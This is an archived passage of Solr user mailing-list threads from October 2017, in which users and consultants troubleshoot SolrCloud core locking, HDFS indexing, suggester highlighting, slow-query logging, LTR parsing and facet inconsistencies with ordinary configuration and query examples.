SOLR cores are getting locked

2017-10-12 Thread Gunalan V
Hello,

I'm using Solr 6.5.1 with 2 Solr nodes in SolrCloud. I created a collection
using the command below [1], and it was created successfully. The next day I
tried to restart the nodes in the SolrCloud cluster: when I start the first
node the collection health is active, but when I start the second node the
collection goes down and I can see the lock errors in the logs [2].

Also, I have uploaded solr.xml to ZooKeeper using the command [3].

Has anyone come across this issue? If so, please let me know how to fix it.


[1]
http://localhost:8983/solr/admin/collections?action=CREATE&name=testcollection&numShards=2&replicationFactor=2&maxShardsPerNode=2&collection.configName=testconfigs


[2]  Caused by: org.apache.lucene.store.LockObtainFailedException: Index
dir
'/data01/solr/solr-6.5.1/server/solr/testcollection_shard1_replica2/data/index/'
of core 'testcollection_shard1_replica2' is already locked. The most likely
cause is another Solr server (or another solr core in this server) also
configured to use this directory; other possible causes may be specific to
lockType: native
at org.apache.solr.core.SolrCore.initIndex(SolrCore.java:713)


[3]  ./solr zk cp file:/data01/solr/solr-6.5.1/server/solr/solr.xml
zk:/solr.xml -z 10.120.166.12:2181,10.120.166.12:2182,10.120.166.12:2183
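
For reference, the lock type named in the error is configured in the
<indexConfig> section of solrconfig.xml; the default setting looks like the
snippet below (shown only to illustrate where the setting lives, not as a
fix):

<indexConfig>
  <lockType>${solr.lock.type:native}</lockType>
</indexConfig>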



Thanks,
GVK


Re: Indexing files from HDFS

2017-10-12 Thread István
Hi Erik,

The question is not about Hue but about why search-mr expects a file_path
field in the schema when indexing HDFS files. I am wondering what the
standard way of indexing files on HDFS is.
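
For reference, a minimal readCSV.conf morphline for a two-column CSV like the
one quoted below might look roughly like this. This is a sketch built from
the Kite Morphlines readCSV, sanitizeUnknownSolrFields and loadSolr commands,
not my exact configuration:

SOLR_LOCATOR : {
  collection : collection0
  zkHost : "name-node.server.com:2181/solr"
}

morphlines : [
  {
    id : readCsvMorphline
    importCommands : ["org.kitesdk.**", "org.apache.solr.**"]
    commands : [
      # parse each CSV line into the fields defined in the schema
      { readCSV { separator : ",", columns : [id, fruit], ignoreFirstLine : true, trim : true, charset : UTF-8 } }
      # drop any record fields that are not present in the Solr schema
      { sanitizeUnknownSolrFields { solrLocator : ${SOLR_LOCATOR} } }
      # hand the resulting records to Solr
      { loadSolr { solrLocator : ${SOLR_LOCATOR} } }
    ]
  }
]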

Thanks,
Istvan

On Wed, Oct 11, 2017 at 4:53 PM, Erick Erickson 
wrote:

> You probably get much more informed responses from
> the Cloudera folks, especially about Hue.
>
> Best,
> Erick
>
> On Wed, Oct 11, 2017 at 6:05 AM, István  wrote:
> > Hi,
> >
> > I have Solr 4.10.3 part of a CDH5 installation and I would like to index
> > huge amount of CSV files on HDFS. I was wondering what is the best way of
> > doing that.
> >
> > Here is the current approach:
> >
> > data.csv:
> >
> > id, fruit
> > 10, apple
> > 20, orange
> >
> > Indexing with the following command using search-mr-1.0.0-cdh5.11.1-job.
> jar
> >
> > hadoop --config /etc/hadoop/conf.cloudera.yarn jar \
> > /opt/cloudera/parcels/CDH/lib/solr/contrib/mr/search-mr-1.0.
> 0-cdh5.11.1-job.jar
> > \
> > org.apache.solr.hadoop.MapReduceIndexerTool \
> > -D 'mapred.child.java.opts=-Xmx500m' --log4j \
> > /opt/cloudera/parcels/CDH/share/doc/search/examples/
> solr-nrt/log4j.properties
> > --morphline-file \
> > /home/user/readCSV.conf \
> > --output-dir hdfs://name-node.server.com:8020/user/solr/output --verbose
> > --go-live \
> > --zk-host name-node.server.com:2181/solr --collection collection0 \
> > hdfs://name-node.server.com:8020/user/solr/input
> >
> > This leads to the following exception:
> >
> > 2219 [main] INFO  org.apache.solr.hadoop.MapReduceIndexerTool  -
> Indexing 1
> > files using 1 real mappers into 1 reducers
> > Error: java.io.IOException: Batch Write Failure
> > at org.apache.solr.hadoop.BatchWriter.throwIf(
> BatchWriter.java:239)
> > ..
> > Caused by: org.apache.solr.common.SolrException: ERROR: [doc=100]
> unknown
> > field 'file_path'
> > at
> > org.apache.solr.update.DocumentBuilder.toDocument(
> DocumentBuilder.java:185)
> > at
> > org.apache.solr.update.AddUpdateCommand.getLuceneDocument(
> AddUpdateCommand.java:78)
> >
> > It appears to me that the schema does not have file_path. The collection
> is
> > created through Hue and it properly identifies the two fields id and
> fruit.
> > I found out that the search-mr tool has the following code that
> references
> > the file_path:
> >
> > https://github.com/cloudera/search/blob/cdh5-1.0.0_5.2.0/
> search-mr/src/main/java/org/apache/solr/hadoop/HdfsFileFieldNames.java#L30
> >
> > I am not sure what to do in order to be able to index files on HDFS. I
> have
> > two guesses:
> >
> > - add the fields defined in the search tool to the schema when I create
> it
> > (not sure how that work through Hue)
> > - disable the HDFS metadata insertion when inserting data
> >
> > Has anybody seen this before?
> >
> > Thanks,
> > Istvan
> >
> >
> >
> >
> > --
> > the sun shines for all
>



-- 
the sun shines for all


Suggester highlighter offsets inaccurate

2017-10-12 Thread Timothy Hill
Hello,

I am using Solr 6.6's Suggester functionality to power an autosuggest
widget that returns lists of people's names.

One requirement that we have is that the suggester be
punctuation-insensitive. For example, entering:

'Dr Joh' should provide the suggestion 'Dr. John', despite the fact that
the user omitted the period after 'dr'.

'Hank Williams Jr' should provide the suggestion 'Hank Williams, Jr.'
despite the omission of both the comma and the period.

This functionality is present, but the punctuation stripping appears to be
causing the highlighting offsets to be miscalculated: we end up with 'Dr
John' for the first query and 'Hank Williams, Jr.' for the second.

Here are the relevant parts of the solrconfig.xml and schema.xml
configurations:




suggestEntity
AnalyzingInfixLookupFactory
DocumentDictionaryFactory
skos_prefLabel
derived_score
payload
suggestType
2
false
false
true
suggest_filters




true
true
10
suggestEntity


suggestEntity













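A suggester component and request handler using the values above would
typically look like the following. This is a reconstruction, not the exact
configuration: the mapping of the bare true/false/numeric values to
parameters such as minPrefixChars, buildOnCommit, buildOnStartup and
highlight is my best guess.

<searchComponent name="suggest" class="solr.SuggestComponent">
  <lst name="suggester">
    <str name="name">suggestEntity</str>
    <str name="lookupImpl">AnalyzingInfixLookupFactory</str>
    <str name="dictionaryImpl">DocumentDictionaryFactory</str>
    <str name="field">skos_prefLabel</str>
    <str name="weightField">derived_score</str>
    <str name="payloadField">payload</str>
    <str name="suggestAnalyzerFieldType">suggestType</str>
    <int name="minPrefixChars">2</int>
    <bool name="buildOnCommit">false</bool>
    <bool name="buildOnStartup">false</bool>
    <bool name="highlight">true</bool>
    <str name="contextField">suggest_filters</str>
  </lst>
</searchComponent>

<requestHandler name="/suggest" class="solr.SearchHandler" startup="lazy">
  <lst name="defaults">
    <str name="suggest">true</str>
    <str name="suggest.count">10</str>
    <str name="suggest.dictionary">suggestEntity</str>
  </lst>
  <arr name="components">
    <str>suggest</str>
  </arr>
</requestHandler>
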
As you can see from the schema.xml document, I've tried storing term
vectors, offsets, etc., but the Suggester highlighter doesn't seem to take
advantage of them.

Does anyone know what I'm doing wrong here? Or is this a bug in the
highlighter?

Thanks,

Tim Hill


Re: Need help with Slow Query Logging

2017-10-12 Thread Emir Arnautović
Hi Atita,
I did not have time to try it out, but will try to do it over the weekend if 
you are still having troubles with it.

Regards,
Emir
--
Monitoring - Log Management - Alerting - Anomaly Detection
Solr & Elasticsearch Consulting Support Training - http://sematext.com/



> On 10 Oct 2017, at 19:59, Atita Arora  wrote:
> 
> No luck for me , did you give it a try meantime ?
> M not sure , if I may have missed something , my logs are completely gone
> after this change.
> 
> Wondering whats wrong with them.
> 
> -Atita
> 
> On Tue, Oct 10, 2017 at 5:58 PM, Atita Arora  wrote:
> 
>> Sure thanks Emir,
>> Let me give them a quick try and I'll update you.
>> 
>> Thanks,
>> Atita
>> 
>> On Tue, Oct 10, 2017 at 5:28 PM, Emir Arnautović <
>> emir.arnauto...@sematext.com> wrote:
>> 
>>> Hi Atita,
>>> I did not try it, but I think that following could work:
>>> 
>>> 
>>> #logging queries
>>> log4j.logger.org.apache.solr.handler.component.QueryComponent=WARN,slow
>>> 
>>> log4j.appender.slow=org.apache.log4j.RollingFileAppender
>>> log4j.appender.slow.File=${solr.log}/slow.log
>>> log4j.appender.slow.layout=org.apache.log4j.EnhancedPatternLayout
>>> log4j.appender.slow.layout.ConversionPattern=%d{yyyy-MM-dd HH:mm:ss.SSS}
>>> %-5p (%t) [%X{collection} %X{shard} %X{replica} %X{core}] %c{1.} %m%n
>>> 
>>> If you want to log all queries, you can change level for query component
>>> to INFO.
>>> 
>>> HTH,
>>> Emir
>>> --
>>> Monitoring - Log Management - Alerting - Anomaly Detection
>>> Solr & Elasticsearch Consulting Support Training - http://sematext.com/
>>> 
>>> 
>>> 
 On 10 Oct 2017, at 13:35, Atita Arora  wrote:
 
 Hi Emir,
 
 So I made few changes to the log4j config , I am able to redirect these
 logs to another file as well.
 But as these are the WARN logs so I doubt any logs enabled at WARN level
 are going to be redirected here in this new log file.
 So precisely , I am using Solr 6.1 (in cloud mode) & I have made few
>>> more
 changes to the logging levels and components.
 Please find my log4j at : *https://pastebin.com/uTLAiBE5
 *
 
 Any help on this will surely be appreciated.
 
 Thanks again.
 
 Atita
 
 
 On Tue, Oct 10, 2017 at 1:39 PM, Emir Arnautović <
 emir.arnauto...@sematext.com> wrote:
 
> Hi Atita,
> You should definetely go with log4j configuration as anything else
>>> would
> be redoing what log4j can do. You already have
>>> slowQueryThresholdMillies to
> make slow queries log with WARN and you can configure log4j to put such
> logs (class + level) to a separate file.
> This seems like frequent question and not sure why putting logs to
> separate file is not a default configuration - maybe it would make
>>> things
> bit more complicated with logs view in admin console…
> If get stuck, let me know (+ Solr version) and I’ll play a bit and send
> you configs.
> 
> HTH,
> Emir
> --
> Monitoring - Log Management - Alerting - Anomaly Detection
> Solr & Elasticsearch Consulting Support Training -
>>> http://sematext.com/
> 
> 
> 
>> On 9 Oct 2017, at 16:27, Atita Arora  wrote:
>> 
>> Hi ,
>> 
>> I have a situation here where I am required to log the slow queries
>>> into
> a
>> seperate log file which then can be used for optimization purposes.
>> For now this log is aggregated into the mainstream log marking
>> [slow:..].
>> I looked into the code and the configuration and I am really clueless
>>> as
> to
>> how do I go about seperating the slow query logs as it needs another
>>> file
>> appender
>> to be created other than the one already present in the log4j.
>> If I create another appender I can do so by degregating through log
> levels
>> , so that moves all the WARN logs to another file (which is not what
>>> I am
>> looking for).
>> Also from the code prespective , I feel how about if I introduce
>>> another
>> config setting along with the slowQueryThresholdMillis value ,
>>> something
>> like
>> 
>> slowQueryLogFile = get("query/slowQueryLogFile", logfilepath);
>> 
>> 
>> where slowQueryLogFile and if present it logs into this file
>>> otherwise it
>> works on the already present along with
>> 
>> slowQueryThresholdMillis = getInt("query/slowQueryThresholdMillis",
>>> -1);
>> 
>> 
>> or should I tweak log4j ?
>> I am not sure if anyone has done that before or have any pointers to
> guide
>> me on this.
>> Please help.
>> 
>> Thanks in advance,
>> Atita
> 
> 
>>> 
>>> 
>> 



RE: Parsing of rq queries in LTR

2017-10-12 Thread alessandro.benedetti
I don't think this is actually that much related to LTR Solr Feature.
In the Solr feature I see you specify a query with a specific query parser
(field).
Unless there is a bug in the SolrFeature for LTR, I expect the query parser
you defined to be used[1].

This means :

"rawquerystring":"{!field f=full_name}alessandro benedetti",
"querystring":"{!field f=full_name}alessandro benedetti",
"parsedquery":"PhraseQuery(full_name:\"alessandro benedetti\")",
"parsedquery_toString":"full_name:\"alessandro benedetti\"",

In relation to multi-term EFI, you need to pass
efi.example='term1 term2' (with the quotes).
Otherwise only one term will be passed as the EFI [2].
This is more likely to be your problem.
I don't think the dash should be relevant at all.

[1]
https://lucene.apache.org/solr/guide/6_6/other-parsers.html#OtherParsers-FieldQueryParser
[2] https://issues.apache.org/jira/browse/SOLR-11386
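
For illustration, a SolrFeature of that shape and a query passing a
multi-term EFI would look roughly like this (the feature and model names
here are made up):

{
  "name"   : "fullNameMatch",
  "class"  : "org.apache.solr.ltr.feature.SolrFeature",
  "params" : { "q" : "{!field f=full_name}${text}" }
}

/select?q=*:*&rq={!ltr model=myModel efi.text='alessandro benedetti'}&fl=id,score,[features]

Note the quotes around the efi value: without them only the first term
reaches the feature.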




-
---
Alessandro Benedetti
Search Consultant, R&D Software Engineer, Director
Sease Ltd. - www.sease.io
--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Need help with Slow Query Logging

2017-10-12 Thread Atita Arora
Indeed, the trouble isn't over yet.
In the meantime we have created
https://issues.apache.org/jira/browse/SOLR-11453

I'll look forward to your updates.

Thanks again,
Atita

On Thu, Oct 12, 2017 at 2:08 PM, Emir Arnautović <
emir.arnauto...@sematext.com> wrote:

> Hi Atita,
> I did not have time to try it out, but will try to do it over the weekend
> if you are still having troubles with it.
>
> Regards,
> Emir
> --
> Monitoring - Log Management - Alerting - Anomaly Detection
> Solr & Elasticsearch Consulting Support Training - http://sematext.com/
>
>
>
> > On 10 Oct 2017, at 19:59, Atita Arora  wrote:
> >
> > No luck for me , did you give it a try meantime ?
> > M not sure , if I may have missed something , my logs are completely gone
> > after this change.
> >
> > Wondering whats wrong with them.
> >
> > -Atita
> >
> > On Tue, Oct 10, 2017 at 5:58 PM, Atita Arora 
> wrote:
> >
> >> Sure thanks Emir,
> >> Let me give them a quick try and I'll update you.
> >>
> >> Thanks,
> >> Atita
> >>
> >> On Tue, Oct 10, 2017 at 5:28 PM, Emir Arnautović <
> >> emir.arnauto...@sematext.com> wrote:
> >>
> >>> Hi Atita,
> >>> I did not try it, but I think that following could work:
> >>>
> >>>
> >>> #logging queries
> >>> log4j.logger.org.apache.solr.handler.component.
> QueryComponent=WARN,slow
> >>>
> >>> log4j.appender.slow=org.apache.log4j.RollingFileAppender
> >>> log4j.appender.slow.File=${solr.log}/slow.log
> >>> log4j.appender.slow.layout=org.apache.log4j.EnhancedPatternLayout
> >>> log4j.appender.slow.layout.ConversionPattern=%d{yyyy-MM-dd
> HH:mm:ss.SSS}
> >>> %-5p (%t) [%X{collection} %X{shard} %X{replica} %X{core}] %c{1.} %m%n
> >>>
> >>> If you want to log all queries, you can change level for query
> component
> >>> to INFO.
> >>>
> >>> HTH,
> >>> Emir
> >>> --
> >>> Monitoring - Log Management - Alerting - Anomaly Detection
> >>> Solr & Elasticsearch Consulting Support Training -
> http://sematext.com/
> >>>
> >>>
> >>>
>  On 10 Oct 2017, at 13:35, Atita Arora  wrote:
> 
>  Hi Emir,
> 
>  So I made few changes to the log4j config , I am able to redirect
> these
>  logs to another file as well.
>  But as these are the WARN logs so I doubt any logs enabled at WARN
> level
>  are going to be redirected here in this new log file.
>  So precisely , I am using Solr 6.1 (in cloud mode) & I have made few
> >>> more
>  changes to the logging levels and components.
>  Please find my log4j at : *https://pastebin.com/uTLAiBE5
>  *
> 
>  Any help on this will surely be appreciated.
> 
>  Thanks again.
> 
>  Atita
> 
> 
>  On Tue, Oct 10, 2017 at 1:39 PM, Emir Arnautović <
>  emir.arnauto...@sematext.com> wrote:
> 
> > Hi Atita,
> > You should definetely go with log4j configuration as anything else
> >>> would
> > be redoing what log4j can do. You already have
> >>> slowQueryThresholdMillies to
> > make slow queries log with WARN and you can configure log4j to put
> such
> > logs (class + level) to a separate file.
> > This seems like frequent question and not sure why putting logs to
> > separate file is not a default configuration - maybe it would make
> >>> things
> > bit more complicated with logs view in admin console…
> > If get stuck, let me know (+ Solr version) and I’ll play a bit and
> send
> > you configs.
> >
> > HTH,
> > Emir
> > --
> > Monitoring - Log Management - Alerting - Anomaly Detection
> > Solr & Elasticsearch Consulting Support Training -
> >>> http://sematext.com/
> >
> >
> >
> >> On 9 Oct 2017, at 16:27, Atita Arora  wrote:
> >>
> >> Hi ,
> >>
> >> I have a situation here where I am required to log the slow queries
> >>> into
> > a
> >> seperate log file which then can be used for optimization purposes.
> >> For now this log is aggregated into the mainstream log marking
> >> [slow:..].
> >> I looked into the code and the configuration and I am really
> clueless
> >>> as
> > to
> >> how do I go about seperating the slow query logs as it needs another
> >>> file
> >> appender
> >> to be created other than the one already present in the log4j.
> >> If I create another appender I can do so by degregating through log
> > levels
> >> , so that moves all the WARN logs to another file (which is not what
> >>> I am
> >> looking for).
> >> Also from the code prespective , I feel how about if I introduce
> >>> another
> >> config setting along with the slowQueryThresholdMillis value ,
> >>> something
> >> like
> >>
> >> slowQueryLogFile = get("query/slowQueryLogFile", logfilepath);
> >>
> >>
> >> where slowQueryLogFile and if present it logs into this file
> >>> otherwise it
> >> works on the already present along with
> >>
> >> slowQueryThresholdMillis = getInt("query/slowQueryThreshold

Re: tf function query

2017-10-12 Thread Dmitry Kan
Sorry, guys, for not responding sooner, and thanks a lot for the answers.

@Erick Erickson: what I would ideally like to have is the tf-idf value for
the user's query. The thing is that we have two searchable fields. While the
boost works just fine for one, there is no easy way to have it multiplied by
the boost from the other field (with the current parser).

@Erik Hatcher: interesting idea, how have I missed it :) Is there a way to
capture the value and push it through to the other field's boost function?
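
(As a rough illustration of the single-term case, the two per-field term
frequencies can be combined in a function query - the field names here are
placeholders:

  q={!func}product(tf(field_a,'term'), tf(field_b,'term'))

The difficulty is doing the same for a full multi-term, boolean query.)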

Thanks a bunch,

Dmitry

On Thu, Oct 5, 2017 at 4:53 PM, Erick Erickson 
wrote:

> What would you  expect as output? tf(field, "a OR b AND c NOT d"). I'm
> not sure what term frequency would even mean in that situation.
>
> tf is a pretty simple function, it expects a single term and there's
> no way I know of to do what you're asking.
>
> Best,
> Erick
>
> On Thu, Oct 5, 2017 at 3:14 AM, Dmitry Kan  wrote:
> > Hi,
> >
> > According to
> > https://lucene.apache.org/solr/guide/6_6/function-
> queries.html#FunctionQueries-AvailableFunctions
> >
> > tf(field, term) requires a term as a second parameter. Is there a
> > possibility to pass in an entire input query (multiterm and boolean) to
> the
> > function?
> >
> > The context here is that we don't use edismax parser to apply multifield
> > boosts, but instead use a custom ranking function.
> >
> > Would appreciate any thoughts,
> >
> > Dmitry
> >
> > --
> > Dmitry Kan
> > Luke Toolbox: http://github.com/DmitryKey/luke
> > Blog: http://dmitrykan.blogspot.com
> > Twitter: http://twitter.com/dmitrykan
> > SemanticAnalyzer: https://semanticanalyzer.info
>



-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
I thought that decision would come back to bite us somehow. At the time, we
didn't have enough space available to do a fresh reindex alongside the old
collection, so the only course of action available was to index over the
old one, and the vast majority of its use worked as expected.

We're planning on upgrading to version 7 at some point in the near future
and will have enough space to do a full, clean reindex at that time.

bq: This can propagate through all following segment merges IIUC.

It is exceedingly unfortunate that reindexing the data on that shard only
probably won't end up fixing the problem.

Out of curiosity, are there any good write-ups or documentation on how two
(or more) lucene segments are merged, or is it just worth looking at the
source code to figure that out?

Thanks,
Chris

On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
wrote:

> bq: ...but the collection wasn't emptied first
>
> This is what I'd suspect is the problem. Here's the issue: Segments
> aren't merged identically on all replicas. So at some point you had
> this field indexed without docValues, changed that and re-indexed. But
> the segment merging could "read" the first segment it's going to merge
> and think it knows about docValues for that field, when in fact that
> segment had the old (non-DV) definition.
>
> This would not necessarily be the same on all replicas even on the _same_
> shard.
>
> This can propagate through all following segment merges IIUC.
>
> So my bet is that if you index into a new collection, everything will
> be fine. You can also just delete everything first, but I usually
> prefer a new collection so I'm absolutely and positively sure that the
> above can't happen.
>
> Best,
> Erick
>
> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
> > Hi,
> >
> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
> > Essentially, a standard facet query on a string field usually comes back
> > empty when it shouldn't. However, every now and again the query actually
> > returns the correct values. This is only affecting a single shard in our
> > setup.
> >
> > The behavior pattern generally looks like the query works properly when
> it
> > hasn't been run recently, and then returns nothing after the query seems
> to
> > have been cached (< 50ms QTime). Wait a while and you get the correct
> > result followed by blanks. It doesn't matter which replica of the shard
> is
> > queried; the results are the same.
> >
> > The general query in question looks like
> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
> >
> > The field is defined in the schema as  > docValues="true"/>
> >
> > There are numerous other fields defined similarly, and they do not
> exhibit
> > the same behavior when used as the facet.field value. They consistently
> > return the right results on the shard in question.
> >
> > If we add facet.method=enum to the query, we get the correct results
> every
> > time (though slower. So our assumption is that something is sporadically
> > working when the fc method is chosen by default.
> >
> > A few other notes about the collection. This collection is not freshly
> > indexed, but has not had any particularly bad failures beyond follower
> > replicas going down due to PKIAuthentication timeouts (has been fixed).
> It
> > has also had a full reindex after a schema change added docValues some
> > fields (including the one above), but the collection wasn't emptied
> first.
> > We are using the composite router to co-locate documents.
> >
> > Currently, our plan is just to reindex all of the documents on the
> affected
> > shard to see if that fixes the problem. Any ideas on what might be
> > happening or ways to troubleshoot this are appreciated.
> >
> > Thanks,
> > Chris
>


[Solr 6.6 w/SolrCloud]: Subqueries - Solr returning a 400 status code, Bad Request when attempting to use the [subquery] transformer

2017-10-12 Thread Damien Hawes
Good day,

*Context and background:*

I have a set of documents that are initially quite deeply nested, but as
part of the pre-index step the documents are flattened so that they are
at most 2 levels deep - a root document and a list of child documents. Each
child document is given some metadata that indicates its relationship to
the other child documents and to the root document in the index.

*The current situation:*

There is a request for me to produce information out of this data, and I
am attempting to return only the relevant fields of the child document(s).
My reading (here and on other sites) has led me to believe that the [child]
transformer is ill suited to this task - feel free to correct me if I am
wrong.

It seems the [subquery] transformer is what I need, and I have read a
previous thread on this list whose post describes exactly what I am trying
to do.

However, when I attempt to do this on my own index, Solr returns a near
useless message. Logging shows the same error.

This is my query:

/select?wt=json&indent=on&q={!parent
which=root_doc_b:true}&rows=1&fq=url:"[hidden
url]"&fq=scan_time:"2017-09-25T19:25:12Z"&fl=url,services:[subquery]&services.q={!child
of=root_doc_b:true}&services.fl=*&services.rows=1&services.fq=service:[* TO
*]

The error given to me:

{
  "error": {
    "metadata": [
      "error-class",
      "org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException",
      "root-error-class",
      "org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException"
    ],
    "msg": "Error from server at
http://solr.solr-cluster:8983/solr/scans_shard2_replica1: Bad
Request\n\nrequest:
http://solr.solr-cluster:8983/solr/scans_shard2_replica1/query",
    "code": 400
  }
}

I haven't even attempted to use the {!terms} parser with this yet.
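
(For reference, the documented [subquery] pattern with the {!terms} parser
looks roughly like the lines below; the parent_id join field is a
placeholder, not my actual schema:

  fl=url,services:[subquery]
  services.q={!terms f=parent_id v=$row.id}
  services.fq=service:[* TO *]
  services.rows=10
)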

Any assistance will be appreciated.

Regards,

Damien Hawes




--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Parsing of rq queries in LTR

2017-10-12 Thread Michael Alcorn
It turns out my last comment on that Jira was mistaken. Multi-term EFI
arguments still exhibit unexpected behavior. Binoy is trying to help me
figure out what the issue is. I plan on updating the Jira once we've
figured out the problem.

On Thu, Oct 12, 2017 at 3:41 AM, alessandro.benedetti 
wrote:

> I don't think this is actually that much related to LTR Solr Feature.
> In the Solr feature I see you specify a query with a specific query parser
> (field).
> Unless there is a bug in the SolrFeature for LTR, I expect the query parser
> you defined to be used[1].
>
> This means :
>
> "rawquerystring":"{!field f=full_name}alessandro benedetti",
> "querystring":"{!field f=full_name}alessandro benedetti",
> "parsedquery":"PhraseQuery(full_name:\"alessandro benedetti\")",
> "parsedquery_toString":"full_name:\"alessandro benedetti\"",
>
> In relation to multi term EFI, you need to pass
> efi.example='term1 term2' .
> If not just one term will be passed as EFI.[2]
> This is more likely to be your problem.
> I don't think the dash should be relevant at all
>
> [1]
> https://lucene.apache.org/solr/guide/6_6/other-parsers.html#OtherParsers-
> FieldQueryParser
> [2] https://issues.apache.org/jira/browse/SOLR-11386
>
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R&D Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
If it's _only_ on a particular replica, here's what you could do:
Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
define the "node" parameter on ADDREPLICA to get it back on the same
node. Then the normal replication process would pull the entire index
down from the leader.

My bet, though, is that this wouldn't really fix things. While it fixes the
particular case you've noticed I'd guess others would pop up. You can
see what replicas return what by firing individual queries at the
particular replica in question with &distrib=false, something like
solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
blah blah


bq: It is exceedingly unfortunate that reindexing the data on that shard only
probably won't end up fixing the problem

Well, we've been working on the DWIM (Do What I Mean) feature for years,
but progress has stalled.

How would that work? You have two segments with vastly different
characteristics for a field. You could change the type, the multiValued-ness,
the analysis chain, there's no end to the things that could go wrong. Fixing
them actually _is_ impossible given how Lucene is structured.

Hmmm, you've now given me a brainstorm I'll suggest on the JIRA
system after I talk to the dev list

Consider indexed=true stored=false. After stemming, "running" can be
indexed as "run". At merge time you have no way of knowing that
"running" was the original term so you simply couldn't fix it on merge,
not to mention that the performance penalty would be...er...
severe.

Best,
Erick

On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
> I thought that decision would come back to bite us somehow. At the time, we
> didn't have enough space available to do a fresh reindex alongside the old
> collection, so the only course of action available was to index over the
> old one, and the vast majority of its use worked as expected.
>
> We're planning on upgrading to version 7 at some point in the near future
> and will have enough space to do a full, clean reindex at that time.
>
> bq: This can propagate through all following segment merges IIUC.
>
> It is exceedingly unfortunate that reindexing the data on that shard only
> probably won't end up fixing the problem.
>
> Out of curiosity, are there any good write-ups or documentation on how two
> (or more) lucene segments are merged, or is it just worth looking at the
> source code to figure that out?
>
> Thanks,
> Chris
>
> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
> wrote:
>
>> bq: ...but the collection wasn't emptied first
>>
>> This is what I'd suspect is the problem. Here's the issue: Segments
>> aren't merged identically on all replicas. So at some point you had
>> this field indexed without docValues, changed that and re-indexed. But
>> the segment merging could "read" the first segment it's going to merge
>> and think it knows about docValues for that field, when in fact that
>> segment had the old (non-DV) definition.
>>
>> This would not necessarily be the same on all replicas even on the _same_
>> shard.
>>
>> This can propagate through all following segment merges IIUC.
>>
>> So my bet is that if you index into a new collection, everything will
>> be fine. You can also just delete everything first, but I usually
>> prefer a new collection so I'm absolutely and positively sure that the
>> above can't happen.
>>
>> Best,
>> Erick
>>
>> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
>> > Hi,
>> >
>> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
>> > Essentially, a standard facet query on a string field usually comes back
>> > empty when it shouldn't. However, every now and again the query actually
>> > returns the correct values. This is only affecting a single shard in our
>> > setup.
>> >
>> > The behavior pattern generally looks like the query works properly when
>> it
>> > hasn't been run recently, and then returns nothing after the query seems
>> to
>> > have been cached (< 50ms QTime). Wait a while and you get the correct
>> > result followed by blanks. It doesn't matter which replica of the shard
>> is
>> > queried; the results are the same.
>> >
>> > The general query in question looks like
>> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
>> >
>> > The field is defined in the schema as > > docValues="true"/>
>> >
>> > There are numerous other fields defined similarly, and they do not
>> exhibit
>> > the same behavior when used as the facet.field value. They consistently
>> > return the right results on the shard in question.
>> >
>> > If we add facet.method=enum to the query, we get the correct results
>> every
>> > time (though slower. So our assumption is that something is sporadically
>> > working when the fc method is chosen by default.
>> >
>> > A few other notes about the collection. This collection is not freshly
>> > indexed, but has not had any particularly bad failures beyond follower
>> > replicas going down due to PKIAuthentication

Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
Never mind. Anything that didn't merge old segments, just threw them
away when empty (which was my idea) would possibly require as much
disk space as the index currently occupied, so doesn't help your
disk-constrained situation.

Best,
Erick

On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson  wrote:
> If it's _only_ on a particular replica, here's what you could do:
> Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> define the "node" parameter on ADDREPLICA to get it back on the same
> node. Then the normal replication process would pull the entire index
> down from the leader.
>
> My bet, though, is that this wouldn't really fix things. While it fixes the
> particular case you've noticed I'd guess others would pop up. You can
> see what replicas return what by firing individual queries at the
> particular replica in question with &distrib=false, something like
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> blah blah
>
>
> bq: It is exceedingly unfortunate that reindexing the data on that shard only
> probably won't end up fixing the problem
>
> Well, we've been working on the DWIM (Do What I Mean) feature for years,
> but progress has stalled.
>
> How would that work? You have two segments with vastly different
> characteristics for a field. You could change the type, the multiValued-ness,
> the analysis chain, there's no end to the things that could go wrong. Fixing
> them actually _is_ impossible given how Lucene is structured.
>
> H, you've now given me a brainstorm I'll suggest on the JIRA
> system after I talk to the dev list
>
> Consider indexed=true stored=false. After stemming, "running" can be
> indexed as "run". At merge time you have no way of knowing that
> "running" was the original term so you simply couldn't fix it on merge,
> not to mention that the performance penalty would be...er...
> severe.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
>> I thought that decision would come back to bite us somehow. At the time, we
>> didn't have enough space available to do a fresh reindex alongside the old
>> collection, so the only course of action available was to index over the
>> old one, and the vast majority of its use worked as expected.
>>
>> We're planning on upgrading to version 7 at some point in the near future
>> and will have enough space to do a full, clean reindex at that time.
>>
>> bq: This can propagate through all following segment merges IIUC.
>>
>> It is exceedingly unfortunate that reindexing the data on that shard only
>> probably won't end up fixing the problem.
>>
>> Out of curiosity, are there any good write-ups or documentation on how two
>> (or more) lucene segments are merged, or is it just worth looking at the
>> source code to figure that out?
>>
>> Thanks,
>> Chris
>>
>> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
